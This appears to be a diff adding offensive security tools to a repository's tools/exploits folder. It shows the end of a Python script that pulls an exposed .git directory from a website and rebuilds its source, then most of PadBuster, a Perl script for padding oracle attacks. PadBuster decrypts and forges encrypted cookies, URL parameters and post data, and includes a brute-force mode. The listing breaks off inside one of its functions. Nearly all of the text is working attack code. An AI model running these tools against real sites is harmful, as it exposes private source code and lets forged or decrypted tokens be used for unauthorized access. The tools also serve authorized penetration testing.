printf('[-] Testing %s/%s/ ', url, module)
|
||||
response = requests.get('%s/%s/' % (url, module), verify=False, allow_redirects=follow_redirects, headers={"User-Agent": USER_AGENT})
|
||||
printf('[%d]\n', response.status_code)
|
||||
|
||||
if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response):
|
||||
printf('[-] Fetching .git recursively\n')
|
||||
process_tasks(['.git/', '.gitignore'],
|
||||
RecursiveDownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects))
|
||||
|
||||
printf('[-] Running git checkout .\n')
|
||||
os.chdir(directory)
|
||||
subprocess.check_call(['git', 'checkout', '.'])
|
||||
return 0
|
||||
|
||||
# no directory listing
|
||||
printf('[-] Fetching common files\n')
|
||||
tasks = [
|
||||
'.gitignore',
|
||||
module + '/COMMIT_EDITMSG',
|
||||
module + '/description',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/applypatch-msg.sample',
|
||||
module + '/hooks/commit-msg.sample',
|
||||
module + '/hooks/post-commit.sample',
|
||||
module + '/hooks/post-receive.sample',
|
||||
module + '/hooks/post-update.sample',
|
||||
module + '/hooks/pre-applypatch.sample',
|
||||
module + '/hooks/pre-commit.sample',
|
||||
module + '/hooks/pre-push.sample',
|
||||
module + '/hooks/pre-rebase.sample',
|
||||
module + '/hooks/pre-receive.sample',
|
||||
module + '/hooks/prepare-commit-msg.sample',
|
||||
module + '/hooks/update.sample',
|
||||
module + '/index',
|
||||
module + '/info/exclude',
|
||||
module + '/objects/info/packs',
|
||||
]
|
||||
|
||||
if module == ".git":
|
||||
tasks.insert(1, '.gitmodules')
|
||||
|
||||
process_tasks(tasks,
|
||||
DownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module))
|
||||
|
||||
if module == ".git":
|
||||
modules_path = os.path.join(directory, '.gitmodules')
|
||||
if os.path.exists(modules_path):
|
||||
module_dir = os.path.join(directory, ".git", "modules")
|
||||
os.makedirs(os.path.abspath(module_dir))
|
||||
with open(modules_path, 'r') as f:
|
||||
modules = f.read()
|
||||
|
||||
for module_name in re.findall(r'\[submodule \"(.*)\"\]', modules):
|
||||
printf("[-] Fetching module: %s\n", module_name)
|
||||
# os.makedirs(os.path.abspath(module_dir))
|
||||
module_url = url + "/.git/modules"
|
||||
fetch_git(module_url, module_dir, jobs, retry, timeout, follow_redirects, module=module_name)
|
||||
printf("[+] Done iterating module\n")
|
||||
|
||||
# find refs
|
||||
printf('[-] Finding refs/\n')
|
||||
tasks = [
|
||||
module + '/FETCH_HEAD',
|
||||
module + '/HEAD',
|
||||
module + '/ORIG_HEAD',
|
||||
module + '/config',
|
||||
module + '/info/refs',
|
||||
module + '/logs/HEAD',
|
||||
module + '/logs/refs/heads/master',
|
||||
module + '/logs/refs/remotes/origin/HEAD',
|
||||
module + '/logs/refs/remotes/origin/master',
|
||||
module + '/logs/refs/stash',
|
||||
module + '/packed-refs',
|
||||
module + '/refs/heads/master',
|
||||
module + '/refs/remotes/origin/HEAD',
|
||||
module + '/refs/remotes/origin/master',
|
||||
module + '/refs/stash',
|
||||
module + '/refs/wip/wtree/refs/heads/master', #Magit
|
||||
module + '/refs/wip/index/refs/heads/master' #Magit
|
||||
]
|
||||
|
||||
process_tasks(tasks,
|
||||
FindRefsWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module))
|
||||
|
||||
# find packs
|
||||
printf('[-] Finding packs\n')
|
||||
tasks = []
|
||||
|
||||
# use .git/objects/info/packs to find packs
|
||||
info_packs_path = os.path.join(directory, 'objects', 'info', 'packs')
|
||||
if os.path.exists(info_packs_path):
|
||||
with open(info_packs_path, 'r') as f:
|
||||
info_packs = f.read()
|
||||
|
||||
for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs):
|
||||
tasks.append(module + '/objects/pack/pack-%s.idx' % sha1)
|
||||
tasks.append(module + '/objects/pack/pack-%s.pack' % sha1)
|
||||
|
||||
process_tasks(tasks,
|
||||
DownloadWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects))
|
||||
|
||||
# find objects
|
||||
printf('[-] Finding objects\n')
|
||||
objs = set()
|
||||
packed_objs = set()
|
||||
|
||||
# .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/*
|
||||
files = [
|
||||
os.path.join(directory, module, 'packed-refs'),
|
||||
os.path.join(directory, module, 'info', 'refs'),
|
||||
os.path.join(directory, module, 'FETCH_HEAD'),
|
||||
os.path.join(directory, module, 'ORIG_HEAD'),
|
||||
]
|
||||
|
||||
for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'refs')):
|
||||
for filename in filenames:
|
||||
files.append(os.path.join(dirpath, filename))
|
||||
for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'logs')):
|
||||
for filename in filenames:
|
||||
files.append(os.path.join(dirpath, filename))
|
||||
|
||||
for filepath in files:
|
||||
if not os.path.exists(filepath):
|
||||
continue
|
||||
|
||||
with open(filepath, 'r') as f:
|
||||
content = f.read()
|
||||
|
||||
for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content):
|
||||
obj = obj[1]
|
||||
objs.add(obj)
|
||||
|
||||
# use .git/index to find objects
|
||||
index_path = os.path.join(directory, module, 'index')
|
||||
if os.path.exists(index_path):
|
||||
index = dulwich.index.Index(index_path)
|
||||
|
||||
# index.iteritems()
|
||||
for entry in index.iteritems():
|
||||
if isinstance(entry[1], dulwich.index.IndexEntry):
|
||||
objs.add(entry[1].sha.decode())
|
||||
elif hasattr(entry[1], "decode"):
|
||||
objs.add(entry[1].decode())
|
||||
|
||||
# use packs to find more objects to fetch, and objects that are packed
|
||||
pack_file_dir = os.path.join(directory, module, 'objects', 'pack')
|
||||
if os.path.isdir(pack_file_dir):
|
||||
for filename in os.listdir(pack_file_dir):
|
||||
if filename.startswith('pack-') and filename.endswith('.pack'):
|
||||
pack_data_path = os.path.join(pack_file_dir, filename)
|
||||
pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx')
|
||||
pack_data = dulwich.pack.PackData(pack_data_path)
|
||||
pack_idx = dulwich.pack.load_pack_index(pack_idx_path)
|
||||
pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx)
|
||||
|
||||
for obj_file in pack.iterobjects():
|
||||
packed_objs.add(obj_file.sha().hexdigest())
|
||||
objs |= set(get_referenced_sha1(obj_file))
|
||||
|
||||
# fetch all objects
|
||||
printf('[-] Fetching objects\n')
|
||||
process_tasks(objs,
|
||||
FindObjectsWorker,
|
||||
jobs,
|
||||
args=(url, directory, retry, timeout, follow_redirects, module),
|
||||
tasks_done=packed_objs)
|
||||
|
||||
# git checkout
|
||||
if module == ".git":
|
||||
printf('[-] Running git checkout .\n')
|
||||
os.chdir(directory)
|
||||
|
||||
# ignore errors
|
||||
subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb'))
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(usage='%(prog)s [options] URL DIR',
|
||||
description='Dump a git repository from a website.')
|
||||
parser.add_argument('url', metavar='URL',
|
||||
help='url')
|
||||
parser.add_argument('--directory', metavar='DIR', default=None, type=str,
|
||||
help='output directory')
|
||||
parser.add_argument('--proxy',
|
||||
help='use the specified proxy')
|
||||
parser.add_argument('-j', '--jobs', type=int, default=10,
|
||||
help='number of simultaneous requests')
|
||||
parser.add_argument('-r', '--retry', type=int, default=3,
|
||||
help='number of request attempts before giving up')
|
||||
parser.add_argument('-t', '--timeout', type=int, default=3,
|
||||
help='maximum time in seconds before giving up')
|
||||
parser.add_argument('-L', '--follow-redirects', default=False,
|
||||
dest='follow_redirects', action="store_true",
|
||||
help='follow redirects')
|
||||
args = parser.parse_args()
|
||||
|
||||
# jobs
|
||||
if args.jobs < 1:
|
||||
parser.error('invalid number of jobs')
|
||||
|
||||
# retry
|
||||
if args.retry < 1:
|
||||
parser.error('invalid number of retries')
|
||||
|
||||
# timeout
|
||||
if args.timeout < 1:
|
||||
parser.error('invalid timeout')
|
||||
|
||||
# proxy
|
||||
if args.proxy:
|
||||
proxy_valid = False
|
||||
|
||||
for pattern, proxy_type in [
|
||||
(r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5),
|
||||
(r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4),
|
||||
(r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP),
|
||||
(r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5)]:
|
||||
m = re.match(pattern, args.proxy)
|
||||
if m:
|
||||
socks.setdefaultproxy(proxy_type, m.group(1), int(m.group(2)))
|
||||
socket.socket = socks.socksocket
|
||||
proxy_valid = True
|
||||
break
|
||||
|
||||
if not proxy_valid:
|
||||
parser.error('invalid proxy')
|
||||
|
||||
# output directory
|
||||
if args.directory is None:
|
||||
parsed_url = urllib.parse.urlparse(args.url)
|
||||
if not parsed_url or not parsed_url.hostname:
|
||||
parser.error('no output directory given and cannot derive from URL')
|
||||
else:
|
||||
args.directory = parsed_url.hostname
|
||||
|
||||
if not os.path.exists(args.directory):
|
||||
os.makedirs(args.directory)
|
||||
|
||||
if not os.path.isdir(args.directory):
|
||||
parser.error('%s is not a directory' % args.directory)
|
||||
|
||||
if os.listdir(args.directory):
|
||||
parser.error('%s is not empty' % args.directory)
|
||||
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
|
||||
# fetch everything
|
||||
path = os.path.realpath(args.directory)
|
||||
code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout, args.follow_redirects)
|
||||
if not os.listdir(path):
|
||||
os.rmdir(path)
|
||||
|
||||
sys.exit(code)
|
||||
890
tools/exploits/padBuster.pl
Executable file
890
tools/exploits/padBuster.pl
Executable file
@@ -0,0 +1,890 @@
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
|
||||
# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)
|
||||
#
|
||||
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
|
||||
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
|
||||
# to James M. Martin (research@esptl.com) for sharing proof of concept exploit
|
||||
# code for performing various brute force attack techniques, and wireghoul (Eldar
|
||||
# Marcussen) for making code quality improvements.
|
||||
#
|
||||
|
||||
use LWP::UserAgent;
|
||||
use strict;
|
||||
use warnings;
|
||||
use Getopt::Std;
|
||||
use MIME::Base64;
|
||||
use URI::Escape;
|
||||
use Getopt::Long;
|
||||
use Time::HiRes qw( gettimeofday );
|
||||
use Compress::Zlib;
|
||||
use Crypt::SSLeay;
|
||||
|
||||
# Set defaults with $variable = value
|
||||
my $logFiles;
|
||||
my $post;
|
||||
my $encoding = 0;
|
||||
my $headers;
|
||||
my $cookie;
|
||||
my $error;
|
||||
my $prefix;
|
||||
my $intermediaryInput;
|
||||
my $cipherInput;
|
||||
my $plainTextInput;
|
||||
my $encodedPlainTextInput;
|
||||
my $noEncodeOption;
|
||||
my $superVerbose;
|
||||
my $proxy;
|
||||
my $proxyAuth;
|
||||
my $noIv;
|
||||
my $auth;
|
||||
my $resumeBlock;
|
||||
my $interactive = 0;
|
||||
my $bruteForce;
|
||||
my $ignoreContent;
|
||||
my $useBody;
|
||||
my $verbose;
|
||||
|
||||
GetOptions( "log" => \$logFiles,
|
||||
"post=s" => \$post,
|
||||
"encoding=s" => \$encoding,
|
||||
"headers=s" => \$headers,
|
||||
"cookies=s" => \$cookie,
|
||||
"error=s" => \$error,
|
||||
"prefix=s" => \$prefix,
|
||||
"intermediate=s" => \$intermediaryInput,
|
||||
"ciphertext=s" => \$cipherInput,
|
||||
"plaintext=s" => \$plainTextInput,
|
||||
"encodedtext=s" => \$encodedPlainTextInput,
|
||||
"noencode" => \$noEncodeOption,
|
||||
"veryverbose" => \$superVerbose,
|
||||
"proxy=s" => \$proxy,
|
||||
"proxyauth=s" => \$proxyAuth,
|
||||
"noiv" => \$noIv,
|
||||
"auth=s" => \$auth,
|
||||
"resume=s" => \$resumeBlock,
|
||||
"interactive" => \$interactive,
|
||||
"bruteforce" => \$bruteForce,
|
||||
"ignorecontent" => \$ignoreContent,
|
||||
"usebody" => \$useBody,
|
||||
"verbose" => \$verbose);
|
||||
|
||||
print "\n+-------------------------------------------+\n";
|
||||
print "| PadBuster - v0.3.3 |\n";
|
||||
print "| Brian Holyfield - Gotham Digital Science |\n";
|
||||
print "| labs\@gdssecurity.com |\n";
|
||||
print "+-------------------------------------------+\n";
|
||||
|
||||
if ($#ARGV < 2) {
|
||||
die "
|
||||
Use: padBuster.pl URL EncryptedSample BlockSize [options]
|
||||
|
||||
Where: URL = The target URL (and query string if applicable)
|
||||
EncryptedSample = The encrypted value you want to test. Must
|
||||
also be present in the URL, PostData or a Cookie
|
||||
BlockSize = The block size being used by the algorithm
|
||||
|
||||
Options:
|
||||
-auth [username:password]: HTTP Basic Authentication
|
||||
-bruteforce: Perform brute force against the first block
|
||||
-ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
|
||||
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
|
||||
-encoding [0-4]: Encoding Format of Sample (Default 0)
|
||||
0=Base64, 1=Lower HEX, 2=Upper HEX
|
||||
3=.NET UrlToken, 4=WebSafe Base64
|
||||
-encodedtext [Encoded String]: Data to Encrypt (Encoded)
|
||||
-error [Error String]: Padding Error Message
|
||||
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
|
||||
-interactive: Prompt for confirmation on decrypted bytes
|
||||
-intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
|
||||
-log: Generate log files (creates folder PadBuster.DDMMYY)
|
||||
-noencode: Do not URL-encode the payload (encoded by default)
|
||||
-noiv: Sample does not include IV (decrypt first block)
|
||||
-plaintext [String]: Plain-Text to Encrypt
|
||||
-post [Post Data]: HTTP Post Data String
|
||||
-prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
|
||||
-proxy [address:port]: Use HTTP/S Proxy
|
||||
-proxyauth [username:password]: Proxy Authentication
|
||||
-resume [Block Number]: Resume at this block number
|
||||
-usebody: Use response body content for response analysis phase
|
||||
-verbose: Be Verbose
|
||||
-veryverbose: Be Very Verbose (Debug Only)
|
||||
|
||||
";}
|
||||
|
||||
# Ok, if we've made it this far we are ready to begin..
|
||||
my $url = $ARGV[0];
|
||||
my $sample = $ARGV[1];
|
||||
my $blockSize = $ARGV[2];
|
||||
|
||||
if ($url eq "" || $sample eq "" || $blockSize eq "") {
|
||||
print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
# Hard Coded Inputs
|
||||
#$post = "";
|
||||
#$sample = "";
|
||||
|
||||
my $method = $post ? "POST" : "GET";
|
||||
|
||||
# These are file related variables
|
||||
my $dirName = "PadBuster." . &getTime("F");
|
||||
my $dirSlash = "/";
|
||||
my $dirCmd = "mkdir ";
|
||||
if (defined($ENV{'OS'})) {
|
||||
if ($ENV{OS} =~ /Windows/) {
|
||||
$dirSlash = "\\";
|
||||
$dirCmd = "md ";
|
||||
}
|
||||
}
|
||||
my $dirExists = 0;
|
||||
my $printStats = 0;
|
||||
my $requestTracker = 0;
|
||||
my $timeTracker = 0;
|
||||
|
||||
if ($encoding < 0 || $encoding > 4) {
|
||||
print "\nERROR: Encoding must be a value between 0 and 4\n";
|
||||
exit();
|
||||
}
|
||||
my $encodingFormat = $encoding ? $encoding : 0;
|
||||
|
||||
my $encryptedBytes = $sample;
|
||||
my $totalRequests = 0;
|
||||
|
||||
# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
|
||||
if ($sample =~ /\%/) {
|
||||
$encryptedBytes = &uri_unescape($encryptedBytes)
|
||||
}
|
||||
|
||||
# Prep the sample for regex use
|
||||
$sample = quotemeta $sample;
|
||||
|
||||
# Now decode
|
||||
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
|
||||
if ( (length($encryptedBytes) % $blockSize) > 0) {
|
||||
print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
|
||||
print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
# If no IV, then append nulls as the IV (only if decrypting)
|
||||
if ($noIv && !$bruteForce && !$plainTextInput) {
|
||||
$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
|
||||
}
|
||||
|
||||
# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
|
||||
my $plainTextBytes;
|
||||
|
||||
# This is a bool to make sure we know where to replace the sample string
|
||||
my $wasSampleFound = 0;
|
||||
|
||||
# ForgedBytes is where the complete forged sample will be stored (encrypt only)
|
||||
my $forgedBytes;
|
||||
|
||||
# Isolate the IV into a separate byte array
|
||||
my $ivBytes = substr($encryptedBytes, 0, $blockSize);
|
||||
|
||||
# Declare some optional elements for storing the results of the first test iteration
|
||||
# to help the user if they don't know what the padding error looks like
|
||||
my @oracleCantidates;
|
||||
my $oracleSignature = "";
|
||||
my %oracleGuesses;
|
||||
my %responseFileBuffer;
|
||||
|
||||
# The block count should be the sample divided by the blocksize
|
||||
my $blockCount = int(length($encryptedBytes)) / int($blockSize);
|
||||
|
||||
if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
|
||||
print "\nERROR: There is only one block. Try again using the -noiv option.\n";
|
||||
exit();
|
||||
}
|
||||
|
||||
# The attack works by sending in a real cipher text block along with a fake block in front of it
|
||||
# You only ever need to send two blocks at a time (one real one fake) and just work through
|
||||
# the sample one block at a time
|
||||
|
||||
|
||||
# First, re-issue the original request to let the user know if something is potentially broken
|
||||
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post, $cookie);
|
||||
|
||||
&myPrint("\nINFO: The original request returned the following",0);
|
||||
&myPrint("[+] Status: $status",0);
|
||||
&myPrint("[+] Location: $location",0);
|
||||
&myPrint("[+] Content Length: $contentLength\n",0);
|
||||
&myPrint("[+] Response: $content\n",1);
|
||||
|
||||
$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if $encodedPlainTextInput;
|
||||
|
||||
if ($bruteForce) {
|
||||
&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
|
||||
my $bfAttempts = 0;
|
||||
|
||||
print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;
|
||||
|
||||
# Only loop through the first 3 bytes...this should be enough as it
|
||||
# requires 16.5M+ requests
|
||||
|
||||
my @bfSamples;
|
||||
my $sampleString = "\x00" x 2;
|
||||
for my $c (0 ... 255) {
|
||||
substr($sampleString, 0, 1, chr($c));
|
||||
for my $d (0 ... 255) {
|
||||
substr($sampleString, 1, 1, chr($d));
|
||||
push (@bfSamples, $sampleString);
|
||||
}
|
||||
}
|
||||
|
||||
foreach my $testVal (@bfSamples) {
|
||||
my $complete = 0;
|
||||
while ($complete == 0) {
|
||||
my $repeat = 0;
|
||||
for my $b (0 ... 255) {
|
||||
$bfAttempts++;
|
||||
if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
|
||||
#SKIP
|
||||
} else {
|
||||
my $testBytes = chr($b).$testVal;
|
||||
$testBytes .= "\x00" x ($blockSize-3);
|
||||
|
||||
my $combinedBf = $testBytes;
|
||||
$combinedBf .= $encryptedBytes;
|
||||
$combinedBf = &myEncode($combinedBf, $encoding);
|
||||
|
||||
# Add the Query String to the URL
|
||||
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie, $sample, $combinedBf);
|
||||
|
||||
|
||||
# Issue the request
|
||||
my ($status, $content, $location, $contentLength) = &makeRequest($method, $testUrl, $testPost, $testCookies);
|
||||
|
||||
my $signatureData = "$status\t$contentLength\t$location";
|
||||
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
|
||||
|
||||
if ($oracleSignature eq "") {
|
||||
&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
|
||||
$oracleGuesses{$signatureData}++;
|
||||
$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
|
||||
if ($b == 255) {
|
||||
&myPrint("*** Response Analysis Complete ***\n",0);
|
||||
&determineSignature();
|
||||
$printStats = 1;
|
||||
$timeTracker = 0;
|
||||
$requestTracker = 0;
|
||||
$repeat = 1;
|
||||
$bfAttempts = 0;
|
||||
}
|
||||
}
|
||||
if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
|
||||
&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
|
||||
&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
|
||||
}
|
||||
}
|
||||
}
|
||||
($repeat == 1) ? ($complete = 0) : ($complete = 1);
|
||||
}
|
||||
}
|
||||
} elsif ($plainTextInput) {
|
||||
# ENCRYPT MODE
|
||||
&myPrint("INFO: Starting PadBuster Encrypt Mode",0);
|
||||
|
||||
# The block count will be the plaintext divided by blocksize (rounded up)
|
||||
my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
|
||||
&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
|
||||
|
||||
my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
|
||||
$plainTextInput.= chr($padCount) x $padCount;
|
||||
|
||||
# SampleBytes is the encrypted text you want to derive intermediate values for, so
|
||||
# copy the current ciphertext block into sampleBytes
|
||||
# Note, nulls are used if not provided and the intermediate values are brute forced
|
||||
|
||||
$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
|
||||
my $sampleBytes = $forgedBytes;
|
||||
|
||||
for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
|
||||
# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
|
||||
my $intermediaryBytes;
|
||||
|
||||
if ($intermediaryInput && $blockNum == $blockCount) {
|
||||
$intermediaryBytes = &myDecode($intermediaryInput,2);
|
||||
} else {
|
||||
$intermediaryBytes = &processBlock($sampleBytes);
|
||||
}
|
||||
|
||||
# Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
|
||||
# This will become the next ciphertext block (or IV if the last one)
|
||||
$sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) * $blockSize), $blockSize);
|
||||
$forgedBytes = $sampleBytes.$forgedBytes;
|
||||
|
||||
&myPrint("\nBlock ".($blockNum)." Results:",0);
|
||||
&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
|
||||
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
|
||||
|
||||
}
|
||||
$forgedBytes = &myEncode($forgedBytes, $encoding);
|
||||
chomp($forgedBytes);
|
||||
} else {
|
||||
# DECRYPT MODE
|
||||
&myPrint("INFO: Starting PadBuster Decrypt Mode",0);
|
||||
|
||||
if ($resumeBlock) {
|
||||
&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
|
||||
} else {
|
||||
$resumeBlock = 1
|
||||
}
|
||||
|
||||
# Assume that the IV is included in our sample and that the first block is the IV
|
||||
for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++) {
|
||||
# Since the IV is the first block, our block count is artificially inflated by one
|
||||
&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);
|
||||
|
||||
# SampleBytes is the encrypted text you want to break, so
|
||||
# lets copy the current ciphertext block into sampleBytes
|
||||
my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize - $blockSize), $blockSize);
|
||||
|
||||
# IntermediaryBytes is where the the intermediary bytes produced by the algorithm are stored
|
||||
my $intermediaryBytes = &processBlock($sampleBytes);
|
||||
|
||||
# DecryptedBytes is where the decrypted block is stored
|
||||
my $decryptedBytes;
|
||||
|
||||
# Now we XOR the decrypted byte with the corresponding byte from the previous block
|
||||
# (or IV if we are in the first block) to get the actual plain-text
|
||||
$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes : $decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) * $blockSize), $blockSize);
|
||||
|
||||
&myPrint("\nBlock ".($blockNum-1)." Results:",0);
|
||||
&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
|
||||
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
|
||||
&myPrint("[+] Plain Text: $decryptedBytes\n",0);
|
||||
$plainTextBytes = $plainTextBytes.$decryptedBytes;
|
||||
}
|
||||
}
|
||||
|
||||
&myPrint("-------------------------------------------------------",0);
|
||||
&myPrint("** Finished ***\n", 0);
|
||||
if ($plainTextInput) {
|
||||
&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
|
||||
} else {
|
||||
&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
|
||||
&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
|
||||
&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
|
||||
}
|
||||
&myPrint("-------------------------------------------------------\n",0);
|
||||
|
||||
sub determineSignature {
|
||||
# Help the user detect the oracle response if an error string was not provided
|
||||
# This logic will automatically suggest the response pattern that occured most often
|
||||
# during the test as this is the most likeley one
|
||||
|
||||
my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys %oracleGuesses;
|
||||
|
||||
&myPrint("The following response signatures were returned:\n",0);
|
||||
&myPrint("-------------------------------------------------------",0);
|
||||
if ($useBody) {
|
||||
&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
|
||||
} else {
|
||||
&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
|
||||
}
|
||||
&myPrint("-------------------------------------------------------",0);
|
||||
|
||||
my $id = 1;
|
||||
|
||||
foreach (@sortedGuesses) {
|
||||
my $line = $id;
|
||||
($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
|
||||
my @sigFields = split("\t", $_);
|
||||
$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
|
||||
$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
|
||||
$line .= "\t$sigFields[2]";
|
||||
&myPrint($line,0);
|
||||
&writeFile("Response_Analysis_Signature_".$id.".txt", $responseFileBuffer{$_});
|
||||
$id++;
|
||||
}
|
||||
&myPrint("-------------------------------------------------------",0);
|
||||
|
||||
if ($#sortedGuesses == 0 && !$bruteForce) {
|
||||
&myPrint("\nERROR: All of the responses were identical.\n",0);
|
||||
&myPrint("Double check the Block Size and try again.",0);
|
||||
exit();
|
||||
} else {
|
||||
my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
|
||||
&myPrint("\nContinuing test with selection $responseNum\n",0);
|
||||
$oracleSignature = $sortedGuesses[$responseNum-1];
|
||||
}
|
||||
}
|
||||
|
||||
sub prepRequest {
|
||||
my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
|
||||
|
||||
# Prepare the request
|
||||
my $testUrl = $pUrl;
|
||||
my $wasSampleFound = 0;
|
||||
|
||||
if ($pUrl =~ /$pSample/) {
|
||||
$testUrl =~ s/$pSample/$pTestBytes/;
|
||||
$wasSampleFound = 1;
|
||||
}
|
||||
|
||||
my $testPost = "";
|
||||
if ($pPost) {
|
||||
$testPost = $pPost;
|
||||
if ($pPost =~ /$pSample/) {
|
||||
$testPost =~ s/$pSample/$pTestBytes/;
|
||||
$wasSampleFound = 1;
|
||||
}
|
||||
}
|
||||
|
||||
my $testCookies = "";
|
||||
if ($pCookie) {
|
||||
$testCookies = $pCookie;
|
||||
if ($pCookie =~ /$pSample/) {
|
||||
$testCookies =~ s/$pSample/$pTestBytes/;
|
||||
$wasSampleFound = 1;
|
||||
}
|
||||
}
|
||||
|
||||
if ($wasSampleFound == 0) {
|
||||
&myPrint("ERROR: Encrypted sample was not found in the test request",0);
|
||||
exit();
|
||||
}
|
||||
return ($testUrl, $testPost, $testCookies);
|
||||
}
|
||||
|
||||
sub processBlock {
|
||||
my ($sampleBytes) = @_;
|
||||
my $analysisMode;
|
||||
# Analysis mode is either 0 (response analysis) or 1 (exploit)
|
||||
$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
|
||||
|
||||
# The return value of this subroutine is the intermediate text for the block
|
||||
my $returnValue;
|
||||
|
||||
my $complete = 0;
|
||||
my $autoRetry = 0;
|
||||
my $hasHit = 0;
|
||||
|
||||
while ($complete == 0) {
|
||||
# Reset the return value
|
||||
$returnValue = "";
|
||||
|
||||
my $repeat = 0;
|
||||
|
||||
# TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
|
||||
my $testBytes = "\x00" x $blockSize;
|
||||
|
||||
my $falsePositiveDetector = 0;
|
||||
|
||||
# Work on one byte at a time, starting with the last byte and moving backwards
|
||||
OUTERLOOP:
|
||||
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
|
||||
INNERLOOP:
|
||||
for (my $i = 255; $i >= 0; $i--) {
|
||||
# Fuzz the test byte
|
||||
substr($testBytes, $byteNum, 1, chr($i));
|
||||
|
||||
